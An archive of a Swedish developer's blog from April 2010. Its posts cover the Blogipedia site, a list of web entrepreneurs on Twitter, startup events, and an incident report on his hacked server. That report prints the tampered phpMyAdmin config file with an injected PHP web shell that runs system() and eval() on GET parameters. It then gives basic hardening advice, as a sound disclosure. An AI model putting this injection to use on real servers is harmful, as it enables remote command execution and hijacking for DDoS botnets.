Thursday, April 29, 2010

Entreprenörerna på Blogipedia

Nu börjar beskrivningarna från förra inlägget dyka upp på Blogipedia.



För vissa kan det dock ta upp till ett par dagar innan texten dyker upp. Bara så ni vet. Glöm inte bort att det finns en widget också, som man kan klistra in på sin egen blogg, om man vill.

Webbentreprenörer på Twitter

Christian Rudolf på entreprenörsbloggen Disruptive gjorde nyligen en lista över webbentreprenörer på Twitter. Det här är en "re-post". Men jag kompletterar med ett "är" i beskrivningen - så att vi bygger upp mer info om dessa personer på Blogipedia också. :)

Glöm nu inte bort att följa dina favorit-entreprenörer...

Andreas Ehn är Tekniksmartast.
Johan Stael von Holstein är en som måste upplevas.
Jonas Lejon är produktiv.
Magnus Bråth är SEO entreprenör.
Peter Sunde är Nätaktivist.
Jesper Åström är there can be only one.
Walter Naeslund är reklam-entreprenör.
Simon Sunden är PR/SEO Entreprenör.
Ted Valentin är webbentreprenör.
Peter Sandberg är min tysta blogkompis.
Nicolai Wadström är Disruptive entreprenör i Sillicon Valley.
Martin Källström är Social Media Entreprenör.
Annika Lidne är Social Media Entreprenör.
Erik Stark är Insiktsfull.
Stellan Löfving är entreprenör.
Mattias Svensson är Sociala medier entreprenör.
Daniel Ek är Grundare Spotify.
Joakim Jardenberg är Mediaengagerad.
Stefan Nilsson är Webentreprenör.
TkJ är Bloggentreprenör.
Tomas Dalin är Webentreprenör.
Thomas Wennström är Webentreprenör.
Isabella Löwengrip är Bloggentreprenör.
Linda Skugge är Trycka böcker på nätet Entreprenör.
David Svensson är Webentreprenör.
Kim Ängalid är Webentreprenör.
Fredrik Malmgren är Affiliateentreprenör.
Andreas Bard är Webentreprenör.
Fredrik Eriksson är SEO entreprenör.
Dan Nilsson är E-handels entreprenör.
Jonathan Sulo är Hosting Entreprenör.
Matthias Miksche är Onlinedockentreprenör.
Mattias Järnhäll är Affärside entreprenör.
Sara Öhman är Social.
Jonas Agerhall är E-handelsentreprenör.
Anton Malmberg är E-handelsentreprenör.
Joel Falck är E-handelsentreprenör.
Hax är Nätaktivist.
Håkan Liljeqvist är Webentreprenör.
Anna C är Mobilentreprenör.
Johan Jörgensson är Riskkapitalist och bibelentreprenör.
Peter Höjman är E-handelsentreprenör.
Jonny Elofsson är Affiliateentreprenör.
Mattias Aspelund är E-handelsentreprenör.
Anders Granström är Webentreprenör.
Fredrik Nas är Domänentreprenör.
Marcus Zacco är Webentreprenör.
Carl-Gustav Öberg är SEO är entreprenör.
Sebastian Stjern är E-handels entreprenör, och hans fru
Lina Sterjn är entreprenör, också. (det är ett familjeföretag)
Heidi Harman är Webentreprenör.
David Haddad är Facebookentreprenör.
Jack Melcher Claësson är Webentreprenör.
Stefan Ekbergh är Webentreprenör.
Jonas Hombert är Webentreprenör.
Martin Lindkvist är Webentreprenör.
Andreas Vural är Webentreprenör.
Tomas Seo är Web och designentreprenör.
Niklas Olsson är Web och grillentreprenör.
Jim Westergren är SEO entreprenör.
Mikael Pawlo är Just nu spelentreprenör.
Roger Åberg är Bloggentreprenör.
Marcus Westerberg är SEO entreprenör.
Björn A är Webentreprenör.
Robert Birming är Webentreprenör.
Tony Hartley är Mobilentreprenör.
Björn Jeffrey är Webkonsultentreprenör.
Daniel Lövquist är Affiliateentreprenör.
Anders Kyhlstedt är Webentreprenör.
Lena Karlsson är Kommunikationsentreprenör.
Johan Lange är Lagspelare och lärande.
Judith Wolst är Behöver Judith Wolst.
Gustav von Sydow är Bättre onlineannonseringsentreprenör.
Tomas Bennich är Anmärkningsvärd.
Per-Fredrik Hagermark är Mobilentreprenör.
Martin S är I själen entreprenör.
Ola Rynge är Kick as personal branding.
Paula Marttila är Internetdrottning.
Patrik Gullstrand är Open Source Entreprenör.
Carina Nyden är Geek Girl Entreprenör.
Sammi Ekdahl är Webentreprenör.
Louise Eriksson är Kommunikationsentreprenör.
Kim Lehult är Affiliate Entreprenör tror jag.
Therese Mannheimer är en som tänker annorlunda.
John Sjölander är Webentreprenör.
Mattias Östmar är Djup Webentreprenör.
Alex Jonson är Open Sourze Entreprenör.
Alex Norström är Mobil och Webentreprenör.
Alfred Ruth är Videoentreprenör.
Marcus Herou är Webentreprenör.
Peder Molin är Online vin entreprenör.
Anders Palm är Webentreprenör.
Joachim Alvarez är Mobilentreprenör.
Karin Adelsköld är Bloggentreprenör.
Johanna Ögren är Bloggentreprenör.
Andreas Ahlenius är Webentreprenör.
Kristoffer Lidman är Webentreprenör.
Susanne Jarl är Webentreprenör.
Tore Friskopp är Webentreprenör.
Peter Alvarsson är Webentreprenör.
Anders Färdig är Iphoneentreprenör.
Dan Rasmussen är Webentreprenör.
+ Martina Lind är Webbentreprenör och driver sajten Politometern.

Om listan inte är komplett så får ni gärna fylla på i kommentarerna till originalinlägget hos Disruptive.nu.

Tuesday, April 27, 2010

Hackad

Livet som webbutvecklare är inte alltid en räkmacka, tyvärr.



Igår ringde Ipeer och berättade att en av mina VPS-servrar blivit hackade. Jag fick reda på att även andra kunder blivit drabbade, men i övrigt var informationen knapphändig. Min server var tydligen delaktig i pågående DDOS-attack. Rådet från Ipeer var "kolla din kod efter säkerhetshål". Har hackarna väl kommit in en gång så kan de komma in igen...

När jag kollade servern låg det mycket riktigt en okänd process (i perl) och körde på 100% av serverns kapacitet. Att bli hackad är en förbannat otrevlig känsla. Jag stängde ner servern och började felsöka. Ganska snabbt upptäckte jag problemet. Det var inte "min" kod det var fel på - utan på PhpMyAdmin.

Så här såg config-filen /var/lib/phpmyadmin/config.inc.php för PhpMyAdmin ut:


* Version: $Id: setup.php 10748 2007-10-10 07:30:59Z cybot_tm $
* Date: Wed, 14 Apr 2010 05:34:54 GMT
*/

/* Servers configuration */
$i = 0;

/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']= ''; if($_GET['c']){echo '
';system($_GET['c']);echo '
';}if($_GET['p']){echo '
';eval($_GET['p']);echo '
';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>
Det riktigt jobbiga är att jag faktiskt hade märkt sedan lång tid tillbaka att den här config-filen ändrades då och då. (Ändringen gör att man inte kan logga in via PhpMyAdmin.) Men jag hade inte fattat att det var ett hacker-angrepp. Jag hade faktiskt till och med både ringt och mailat Ipeer om problemet - men dom hade inte några tips att komma med. Själv tänkte jag aldrig tanken att det kunde vara ett angrepp, utan trodde att det var någon slags bugg.

Så här i efterhand är det ju fullständigt uppenbart vad det är för fel i koden ovan. Det är en kod-injection. De flesta webbutvecklare känner till att man måste akta sig för SQL-injections. Det här påminner lite grann om det, fast ännu allvarligare. Injektionen gör att man kan exekvera kod på serverns kommandorad direkt via webbläsaren.

En snabb googling ledde mig till den här sidan där säkerhetshålet beskrivs. Det jobbiga är att det till råga på allt verkar ganska enkelt. Kom igång och börja hacka servrar på en eftermiddag, typ.

Ett par lärdomar.
Jag skulle gissa att det i grunden finns två olika kategorier av hacker-angrepp:
  1. Angrepp där man på "manuell" väg hackar utvalda stora sajter. Exempelvis Google, TV3, Aftonbladet, Spotify eller Voddler. Ju större desto bättre. Motivationen kan vara att komma över stora mängder användaruppgifter (emailadresser, användarkonton, kreditkortsuppgifter) eller att helt enkelt få cred i hacker-kretsar.
  2. Angrepp där man på "systematisk" väg utnyttjar säkerhetshål på servrar runt om i hela världen. När en programvara blir populär (exempelvis Wordpress, PhyMyAdmin, Joomla, Drupal, Awstats) så blir risken större att det upptäcks säkerhetshål i dem som förhållandevis "storskaliga" hackers kan utnyttja för attacker. Tänk dig regelrätta "företag" som scannar av miljontals sajter, och hittar tusentals servrar som de sedan kan hyra ut för DDOS-attacker. Så kallde Bot-nets. Det mesta tyder på att detta idag är en utbredd ekonomi, där olika företag har hand om olika nivåer av exploateringen.
Jag rekommenderar verkligen den här artikeln i Wired om the attack of the Bots. Den är från 2006, men är förmodligen ännu mer relevant idag.

Så vad kan man göra för att skydda sig från angrepp?
  1. Se till att du med jämna mellanrum uppgraderar de programvaror du installerat på din server.
  2. Var restriktiv med skriv-access på din server. Se till att de olika användarkontona bara har skrivrättigheter i de mappar där de verkligen *behöver* ha skrivrättigheter.
  3. Ha backup.
Generellt sett så kan man aldrig räkna med att vara helt säker. Nya säkerhetshål hittas hela tiden, och det tar alltid ett tag innan de täpps igen.

Monday, April 26, 2010

Gästbloggar...

Den här veckan gästbloggar jag om min arbetsvecka på Internetworlds blogg vid namn "Loggenbloggen". Jag ska försöka blogga ofta men kortfattat. Det blir alltså inga långa filosofiska inlägg utan främst små "snapshots" från min arbetsvecka. Veckan har börjat med en del problem, så vi får se hur det artar sig :)

Wednesday, April 21, 2010

Blogipedia - now in English

Blogipedia.com is a really fun website that I have developed. It is a bit like Wikipedia - but with facts and opinions automatically collected from millions of blogs.



I released the Swedish beta version of the website seven months ago. And now, finally, Blogipedia speaks English a well. My inspiration for Blogipedia.com came from a video with Matt Cutts. (Matt, if you're listening, thanks for the inspiration.)

Now let's go explore. This is what the blogosphere says about the iPad:



And here is what the blogosphere is saying about Blondinbella, a Swedish blogger:



Actually there is no information about Blondinbella at the english-language Wikipedia. That's one of ways in which Blogipedia is actually *better* than Wikipedia. It picks up new people and phenomenon much, much faster!

There are more fun things that you can do with Blogipedia. If you are Bill Gates, you can put this nice widget on your blog:



But if you're Steve Jobs, for example, you can use a very similar but just slightly different widget:



As you see, the widget possibilitis are endless! You also have the option to email, tweet, or Facebook a little comparison to your friends...



Go play! Hope you enjoy it!

And, oh, I almost forgot the most important part. Blogipedia still needs your help in order to become a great service. Please become a member and help out with categorizing the texts. There is no artificial intelligence at work here - instead there's the wisdom of the crowds. Blogipedia needs your wisdom. Yes, yours! I'm looking at YOU. Join Blogipedia here.

Monday, April 19, 2010

Grötentreprenörer

DI Weekend hade häromveckan en stor artikel om Grötentreprenörerna. Det vill säga om oss webb-entreprenörer som inte behöver, eller vill ha, riskkapital. Det var en kul, välskriven artikel, så om du missade den finns den på nätet här.



Termen grötentreprenör är faktiskt helt ny. En annan term som använts lite grann, men inte riktigt tagit fart, är "miniprenörer". Jag tror faktiskt jag gillar termen grötentreprenörer bättre. Fredrik Sjöshult är journalisten bakom artikeln och alltså den som myntade uttrycket. Förmodligen har han blivit inspirerad av Christian Rudolf på Disruptive, som sedan ett tag tillbaka använt begreppet grötkapital.

Nya fenomen behöver nya begrepp för att bli förstådda. Även termen "teknik" var en gång i tiden ett nytt ord. Det ska bli kul att se om termen grötentreprenör biter sig fast.

Thursday, April 8, 2010

Saker på gång

Startup Weekend är ett event som kan bli spännande. Ni har väl inte missat mitt inlägg om det häromdagen? Jag har i alla fall några gratisbiljetter, så maila mig om du vill ha en av dem. (Det kostar annars 600 kr att delta.)



Jonas Lejon är superentreprenören som aldrig slutar att överraska. Vid sidan om sitt vanliga jobb (!) har han utvecklat Bloggy.se, Govdata.se, Blogbackupr.com, Domaintool.se och ett 20-tal andra sajter. Igår tillkännagjorde han på sin blogg att han köpt domänen Singlar.se för ett stort belopp. (Sex-siffrigt, säger ryktet.) Var ska detta sluta? Jag skulle gissa att Jonas kommit över en databas över alla ogifta svenskar. Men man kan bara spekulera.



För egen del har jag precis blivit klar med Pizzakartan.se, en sajt som folk frågat efter i snart två år! Var finns bra och dålig pizza? Hjälp gärna till och dela med dig av dina pizza-upplevelser. Jag tror att Pizzakartan kan bli en riktigt trevlig sajt. :)



New York Times skrev igår om folk som fotar maten och lägger upp bilderna på nätet. Ett coolt fenomen, och faktiskt finns det redan en hel del människor som använder mina kartsajter på det sättet! Kolla in Jehanna, som laddar upp bilder på sushin hon äter. Men hjälp av iPhone-appen (Allakartor.se) är det extremt enkelt att göra, så hoppas att fler hakar på. Appen har nu 8000 nedladdningar från app-store och du hittar den för gratis nedladdning här. Det finns är även en app som heter iKartor.se och en app för Android.

Wednesday, April 7, 2010

Blogipedia får dedikerad server

En del av er som använde Blogipedia för ett par månader sedan märke att sajten hade lite problem. Responstiderna var lååånga (ibland upp till 6-7 sekunder) och ibland dök det upp elaka felmeddelanden som skvallrade om att servern var överlastad.

Anledningen: Blogipedia har växt explosionsartat. Jag släppte sajten för drygt sju månader sedan. Idag har sajten:
I jämförelse: I antal artiklar räknat så är Blogipedia idag ungefär en femtedel så stort som Wikipedia. Men bloggosfären växer explosionsartat - och Blogipedia med den. Inom ett år eller två lär svenska Blogipedia gå om svenska Wikipedia i antal artiklar.

Server-lösningen: Blogipedia låg initialt på en VPS från Ipeer, en lösning som jag tycker är extremt praktisk för mina nystartade sajter. För 165 kr / månaden får man en riktig server-miljö, som man enkelt kan "skala upp" om sajten skulle blir framgångsrik. För Blogipedias del blev kostymen ganska snabbt för liten, så nu har jag flyttat hela databasen till en dedikerad server, som står i samma sever-hall hos Ipeer. Databasservern är av typen Dedikerad 3: Fyra processorer, 8 Gb RAM, 438 Gb Hårddisk. I Google Webmaster Tools kan man kolla hur flytten påverkade sajten:


Ganska trevligt, eller hur? Responstiden har gått från 2 till 0,2 sekunder i snitt. För ett par månader sedan blev jag väckt på nätterna av Pingdom, när sajten gick ner. Nu har jag fått min nattsömn åter. Min gissning är att den dedikerade servern bör klara Blogipedia på 10 språk och 100.000 besökare om dagen. Inom kort är det dags att lansera Blogipedia i några nya länder.

PS. Ni har väl sett fantastiska Mediacreeper? Jag tycker att det är väldigt skoj att att se hur svenska medier dagligen använder sig av Blogipedia i sin research. :)

Tuesday, April 6, 2010

Startup Day. Weekend. Camp!

Nu bubblar det i start-up-Sverige. Det är ett antal evenemang på gång just nu med den gemensamma nämnaren att de börjar med Startup... någonting. Här är dom.

Startup Day
24 april, på Debaser Medis vid Medborgarplatsen i Stockholm. (Bra lokal.) Startup Day arrangeras av Stockholm School of Entreprenurship, SSES, som också var medarrangör för senaste 24HBC. Temat är "Do Different". Kolla in talarlistan här. Bland talarna finns bland annat Emma Stenström (Handelshögskolan), Lisa Granberg and Elin Tybring (Mywebwill.com), Sorosh Tavakoli (Videoplaza.com), Peter Arvai (Prezi.com). Och så jag, då. Kom och lyssna.

Startup Weekend
16 - 18 april. En hel helg alltså. I Stockholm. Bland annat (?) på Videoplazas nya fräscha kontor. Startup Weekend påminner lite om 24HBC, fast med vissa andra förutsättningar - på vilket sätt det skiljer sig kan du läsa om här. Fin idé det där med staty utanför ilcaffè, by the way. Ho-ho. Stort tack för dom vänliga orden.

Startup Camp
Nu pratar vi 10 veckors entreprenörs-internat. Oj! Tillbringa hela sommaren i Karlshamn, med skärgården och badmöjligheter runt knuten. Ganska spännande, eller hur? Startup Camp arrangeras av ingen mindre än super-entreprenören Tomas Wennström, som även ligger bakom Sweden Social Web Camp (SSWC) den 13-15 augusti.

Som sagt, mycket startup på schemat nu. Heja Sverige, nu kör vi. Om det är något startup-evenemang jag missat så hojta gärna till. :)